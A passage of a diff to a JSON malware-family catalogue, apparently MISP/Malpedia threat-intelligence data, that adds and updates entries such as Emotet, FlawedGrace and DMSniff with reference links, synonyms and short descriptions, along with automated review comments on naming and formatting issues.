 "uuid": "495377c4-1be5-4c65-ba66-94c221061415",
 "value": "Corebot"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn",
+ "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "331f0c80-a795-48aa-902e-0b0d57de85f5",
+ "value": "CoreDN"
+ },
 {
 "description": "",
 "meta": {
@@ -5166,6 +6263,7 @@
 "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/",
 "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf",
 "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf",
+ "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/",
 "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/"
 ],
 "synonyms": [
@@ -5177,6 +6275,19 @@
 "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6",
 "value": "CrashOverride"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.creamsicle",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9d193a65-dc18-4832-9daa-aab245cd1c86",
+ "value": "CREAMSICLE"
+ },
 {
 "description": "",
 "meta": {
@@ -5207,13 +6318,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
+ "https://s.tencent.com/research/report/669.html",
 "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF"
 ],
- "synonyms": [],
+ "synonyms": [
+ "SEEDOOR"
+ ],
 "type": []
 },
 "uuid": "a61fc694-a88a-484d-a648-db35b49932fd",
- "value": "Crimson"
+ "value": "Crimson RAT"
 },
 {
 "description": "",
@@ -5235,11 +6350,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl",
- "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
+ "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx",
 "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware",
 "https://hackmag.com/security/ransomware-russian-style/",
- "https://twitter.com/demonslay335/status/971164798376468481",
- "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx"
+ "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/",
+ "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
+ "https://twitter.com/demonslay335/status/971164798376468481"
 ],
 "synonyms": [],
 "type": []
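Review bot: The Crimson hunk renames the cluster value from `"value": "Crimson"` to `"value": "Crimson RAT"` while the `uuid` stays the same, so anything that references this cluster by its display value (tags, saved searches, external mappings) stops resolving even though the cluster itself survives. Carrying the old name forward as a synonym, `"synonyms": [ "Crimson", "SEEDOOR" ]`, keeps it findable under both spellings at no cost. Whether downstream consumers key on the value rather than the uuid is not visible in this patch, so treat this as a question for the data maintainers rather than a blocker.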
@@ -5558,15 +6674,21 @@
 "value": "Dairy"
 },
 {
- "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ",
+ "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. 
",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot",
 "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/",
- "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/",
 "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns",
- "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/"
+ "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/",
+ "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/",
+ "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html",
+ "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0",
+ "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/",
+ "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/",
+ "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/",
+ "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/"
 ],
 "synonyms": [],
 "type": []
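Review bot: The DanaBot description line is rewritten only to escape the curly quotes as `\u201c`/`\u201d`/`\u2019`, but it keeps the trailing space before the closing quote (`... of this banker. "`) and the misspelled vendor name in `Proofpoints describes DanaBot`. Since the line is already being replaced, this is the moment to drop the trailing whitespace and write `Proofpoint describes DanaBot`. The hunk begins on the previous physical line.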
@@ -5579,10 +6701,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet",
- "https://darkcomet.net",
- "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/",
+ "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
 "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
- "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/"
+ "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/",
+ "https://darkcomet.net",
+ "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/"
 ],
 "synonyms": [
 "Fynloski",
@@ -5818,7 +6942,7 @@
 "value": "DeriaLock"
 },
 {
- "description": "",
+ "description": " A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi",
@@ -5826,7 +6950,9 @@
 "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf",
 "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/"
 ],
- "synonyms": [],
+ "synonyms": [
+ "PHOTO"
+ ],
 "type": []
 },
 "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5",
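Review bot: The new Derusbi description in the second hunk begins with a leading space, `"description": " A DLL backdoor ..."`, which survives into every rendering of the entry; the FLASHFLOOD description added later in this patch has the same leading space and additionally carries `\r\n` breaks in the middle of two sentences (`from the\r\nremovable drive` and `system information\r\nor contacts`), which look like line wraps copied out of the APT30 report. Trimming the leading space here and in FLASHFLOOD, and joining those wrapped fragments into single sentences, would bring both in line with the other descriptions in this file, which start with the text itself and only use `\r\n` to separate paragraphs or list items.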
@@ -5930,6 +7056,19 @@
 "uuid": "61b2dd12-2381-429d-bb64-e3210804a462",
 "value": "DirCrypt"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs",
+ "https://twitter.com/cyb3rops/status/1101138784933085191"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3bbf08fd-f147-4b23-9d48-a53ac836bc05",
+ "value": "DispenserXFS"
+ },
 {
 "description": "",
 "meta": {
@@ -5940,7 +7079,9 @@
 "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware",
 "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412",
 "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis",
- "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon"
+ "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
+ "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/"
 ],
 "synonyms": [],
 "type": []
@@ -5963,6 +7104,19 @@
 "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed",
 "value": "DMA Locker"
 },
+ {
+ "description": "DMSniff is a point-of-sale malware previously only privately sold. It has been used in breaches of small- and medium-sized businesses in the restaurant and entertainment industries. It uses a domain generation algorithm (DGA) to create lists of command-and-control domains on the fly.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff",
+ "https://www.flashpoint-intel.com/blog/dmsniff-pos-malware-actively-leveraged-target-medium-sized-businesses/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f",
+ "value": "DMSniff"
+ },
 {
 "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.",
 "meta": {
@@ -5972,7 +7126,9 @@
 "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html",
 "https://blog.talosintelligence.com/2017/03/dnsmessenger.html"
 ],
- "synonyms": [],
+ "synonyms": [
+ "TEXTMATE"
+ ],
 "type": []
 },
 "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6",
@@ -5983,9 +7139,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage",
- "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html"
+ "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/",
+ "https://www.us-cert.gov/ncas/alerts/AA19-024A",
+ "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
+ "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html",
+ "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html",
+ "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/",
+ "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
+ ],
+ "synonyms": [
+ "Agent Drable",
+ "Webmask"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "ef46bd90-91d0-4208-b3f7-08b65acb8438",
@@ -6123,6 +7288,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
 "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
 "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/",
 "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/",
@@ -6139,6 +7305,24 @@
 "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e",
 "value": "Dridex"
 },
+ {
+ "description": "Driftpin is a small and simple backdoor that enables the attackers to assess the victim. When executed the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes and get information about the system and campaign ID.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html",
+ "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/"
+ ],
+ "synonyms": [
+ "Spy.Agent.ORM",
+ "Toshliph"
+ ],
+ "type": []
+ },
+ "uuid": "76f6f047-1362-4651-bd2f-9ca10c119e8d",
+ "value": "DRIFTPIN"
+ },
 {
 "description": "",
 "meta": {
@@ -6253,7 +7437,8 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre",
 "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
 "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
- "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates"
+ "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates",
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/"
 ],
 "synonyms": [
 "Dyreza"
@@ -6289,6 +7474,20 @@
 "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca",
 "value": "EHDevel"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder",
+ "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf",
+ "https://www.clearskysec.com/iec/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "31b18d64-815c-4464-8fcc-f084953a75f5",
+ "value": "ElectricPowder"
+ },
 {
 "description": "",
 "meta": {
@@ -6318,6 +7517,23 @@
 "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01",
 "value": "Elise"
 },
+ {
+ "description": "ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings. To retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer",
+ "https://www.symantec.com/security-center/writeup/2015-122210-5724-99",
+ "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html",
+ "https://attack.mitre.org/software/S0064"
+ ],
+ "synonyms": [
+ "Elmost"
+ ],
+ "type": []
+ },
+ "uuid": "e0a8bb01-f0c8-4e2c-bd1e-4c84135ba834",
+ "value": "ELMER"
+ },
 {
 "description": "",
 "meta": {
@@ -6334,6 +7550,54 @@
 "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a",
 "value": "Emdivi"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html",
+ "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage",
+ "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/",
+ "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/",
+ "https://github.com/d00rt/emotet_research",
+ "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html",
+ "https://www.us-cert.gov/ncas/alerts/TA18-201A",
+ "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/",
+ "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html",
+ "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1",
+ "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/",
+ "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/",
+ "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/",
+ "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/",
+ "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor",
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/",
+ "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html",
+ 
"https://persianov.net/emotet-malware-analysis-part-1",
+ "https://persianov.net/emotet-malware-analysis-part-2",
+ "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/",
+ "https://paste.cryptolaemus.com",
+ "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc",
+ "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/",
+ "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader",
+ "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/",
+ "https://feodotracker.abuse.ch/?filter=version_e",
+ "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus",
+ "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/",
+ "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69"
+ ],
+ "synonyms": [
+ "Geodo",
+ "Heodo"
+ ],
+ "type": []
+ },
+ "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7",
+ "value": "Emotet"
+ },
 {
 "description": "",
 "meta": {
@@ -6530,6 +7794,20 @@
 "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc",
 "value": "EvilGrab"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum",
+ "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
+ "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "da922c36-ca13-4ea2-a22d-471e91ddac93",
+ "value": "EVILNUM (Windows)"
+ },
 {
 "description": "Privately modded version of the Pony stealer.",
 "meta": {
@@ -6590,6 +7868,19 @@
 "uuid": "74f8db32-799c-41e5-9815-6272908ede57",
 "value": "MS Exchange Tool"
 },
+ {
+ "description": "ExileRAT is a simple RAT platform capable of getting information on the system (computer name, username, listing drives, network adapter, process name), getting/pushing files and executing/terminating processes.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat",
+ "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c932a2f3-1470-4b0c-8412-2d081901277b",
+ "value": "Exile RAT"
+ },
 {
 "description": "",
 "meta": {
@@ -6696,6 +7987,19 @@
 "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034",
 "value": "FantomCrypt"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer",
+ "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f197b0a8-6bea-42ea-b57f-8f6f202f7602",
+ "value": "Farseer"
+ },
 {
 "description": "",
 "meta": {
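Review bot: The new cluster's `"value": "Exile RAT"` does not match the spelling used by its own description (`ExileRAT`), by the malpedia slug in refs (`win.exilerat`) or by the Talos post title, so a lookup by either spelling can miss the entry. Settling on one form for the value and recording the other as a synonym, `"synonyms": [ "ExileRAT" ]`, keeps both spellings resolvable.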
@@ -6886,11 +8190,38 @@
 "uuid": "1ab17959-6254-49af-af26-d34e87073e49",
 "value": "FirstRansom"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame",
+ "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c40dbede-490f-4df4-a242-a2461e3cfc4e",
+ "value": "Flame"
+ },
+ {
+ "description": " FLASHFLOOD will scan inserted removable drives for targeted files, and copy those files from the\r\nremovable drive to the FLASHFLOOD-infected system. FLASHFLOOD may also log or copy additional data from the victim computer, such as system information\r\nor contacts.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0ce7e94e-da65-43e4-86f0-9a0bb21d1118",
+ "value": "FLASHFLOOD"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy",
+ "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930",
 "https://github.com/Coldzer0/Ammyy-v3",
 "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/",
 "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat",
@@ -6902,6 +8233,20 @@
 "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4",
 "value": "FlawedAmmyy"
 },
+ {
+ "description": "According to ProofPoint, FlawedGrace is written in C++ and can be categorized as a Remote Access Trojan (RAT). It seems to have been developed in the second half of 2017 mainly.\r\n\r\nFlawedGrace uses a series of commands:\r\nFlawedGrace also uses a series of commands, provided below for reference:\r\n* desktop_stat\r\n* destroy_os\r\n* target_download\r\n* target_module_load\r\n* target_module_load_external\r\n* target_module_unload\r\n* target_passwords\r\n* target_rdp\r\n* target_reboot\r\n* target_remove\r\n* target_script\r\n* target_servers\r\n* target_update\r\n* target_upload\r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace",
+ "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
+ "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ef591233-4246-414b-9fbd-46838f3e5da2",
+ "value": "FlawedGrace"
+ },
 {
 "description": "",
 "meta": {
@@ -6935,6 +8280,19 @@
 "uuid": "057ff707-a008-4ab8-8370-22b689ed3412",
 "value": "FlokiBot"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop",
+ "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0024c2d9-673f-4999-b240-4ae61a72c9b9",
+ "value": "FlowerShop"
+ },
 {
 "description": "",
 "meta": {
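Review bot: The new FlawedGrace description repeats its own lead-in: `FlawedGrace uses a series of commands:\r\nFlawedGrace also uses a series of commands, provided below for reference:` introduces the same list twice, and the string ends on a dangling `\r\n`. Keep one of the two sentences, e.g. `FlawedGrace uses a series of commands, provided below for reference:`, and drop the trailing line break so the value ends on its last list item like the other descriptions in this file.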
@@ -6990,6 +8348,8 @@
 "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/",
 "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/",
 "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html",
+ "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/",
+ "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf",
 "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent",
 "https://blog.talosintelligence.com/2018/06/my-little-formbook.html"
 ],
@@ -7033,6 +8393,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec",
 "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/",
 "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/"
 ],
@@ -7134,14 +8496,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab",
+ "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/",
 "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/",
 "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/",
 "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/",
 "http://asec.ahnlab.com/1145",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
 "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/",
 "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/",
 "https://isc.sans.edu/diary/23417",
+ "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html",
 "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html",
+ "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
 "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf",
 "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/",
 "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom"
@@ -7227,38 +8593,17 @@
 "value": "GearInformer"
 },
 {
- "description": "",
+ "description": "According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key.\r\nGEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn't exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo",
- "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/",
- "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/",
- "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/",
- "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html",
- "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/",
- "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/",
- "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc",
- "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/",
- "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/",
- "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader",
- "https://www.us-cert.gov/ncas/alerts/TA18-201A",
- "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor",
- "https://feodotracker.abuse.ch/?filter=version_e",
- "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/",
- "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html",
- "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1"
- ],
- "synonyms": [
